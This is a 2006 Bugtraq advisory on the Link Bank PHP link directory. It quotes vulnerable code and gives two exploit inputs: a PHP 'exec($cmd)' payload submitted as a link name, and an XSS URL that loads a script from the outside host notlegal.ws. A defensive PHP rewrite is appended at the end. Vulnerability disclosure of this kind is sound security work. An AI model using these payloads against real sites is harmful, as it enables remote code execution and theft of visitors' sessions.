Bugtraq mailing list archives

link bank code execution and xss


From: retard () 30gigs com
Date: 6 Mar 2006 23:52:13 -0000

-------- summary
        software: Link Bank
        vendors website: http://daverave.64digits.com/index.php?page=linkbank
        versions: n/a
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard
        risk level: high

-------- description
        Link Bank does not sanitise posts submitted to it, allowing users to
        insert data that can be used maliciously. After it is submitted, the
        data goes to a .txt file which the application reads and executes
        to display the links submitted. Along with this, it is vulnerable
        to XSS due to the application again not sanitising the variable.
        
        in ./content/index.txt:
        <?php
        include("links.txt");
        ?>

        in ./content/add_link.txt:
        $url_name = $_REQUEST['url_name'];
        $url = $_REQUEST['url'];
        $img = $_REQUEST['img'];
        $filename = "content/links.txt";
        $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";

        in ./iframe.php:
        <title>Link Bank - <?php echo"$site";?></title>

-------- exploit(s)
        code execution:
        submit something like <?php exec($cmd) ?> as a link name

        xss:
        
http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

-------- credit
        author(s): retard
        email: retard () 30gigs com
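
A hardened sketch of the three code paths quoted in the description, as an added example that is not part of the original advisory and not Link Bank's own code. The function names, the 100-byte name limit and the one-JSON-object-per-line storage format are assumptions; the point is that submissions are stored as data, read without include(), and HTML-encoded on output.

```php
<?php
// Added example, not Link Bank's code. Function names and the JSON-lines
// storage format are assumptions made for illustration.
const LINKS_FILE = 'content/links.txt';

// Accept only absolute http(s) URLs; rejects javascript:, data:, etc.
function valid_http_url(string $url): bool
{
    return filter_var($url, FILTER_VALIDATE_URL) !== false
        && in_array(strtolower((string) parse_url($url, PHP_URL_SCHEME)), ['http', 'https'], true);
}

// add_link: store the submission as data (one JSON object per line), never
// as markup. JSON_HEX_TAG keeps a literal PHP open tag out of the file.
function add_link(string $name, string $url, string $file = LINKS_FILE): bool
{
    $name = trim($name);
    if ($name === '' || strlen($name) > 100 || !valid_http_url($url)) {
        return false;
    }
    $json = json_encode(['name' => $name, 'url' => $url], JSON_HEX_TAG | JSON_HEX_AMP);
    return $json !== false
        && file_put_contents($file, $json . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// index: read the file as text (no include()) and encode every value on output.
function render_links(string $file = LINKS_FILE): string
{
    $lines = is_readable($file) ? file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
    $html = '';
    foreach ($lines ?: [] as $line) {
        $rec = json_decode($line, true);
        if (!is_array($rec) || !is_string($rec['name'] ?? null) || !is_string($rec['url'] ?? null)) {
            continue; // skip malformed records
        }
        $href = 'iframe.php?site=' . rawurlencode($rec['url']);
        $html .= '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '" target="_blank" rel="noopener">'
            . htmlspecialchars($rec['name'], ENT_QUOTES, 'UTF-8') . "</a><br>\n";
    }
    return $html;
}

// iframe.php: encode the request parameter before echoing it into <title>.
function render_title(string $site): string
{
    return '<title>Link Bank - ' . htmlspecialchars($site, ENT_QUOTES, 'UTF-8') . '</title>';
}
```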
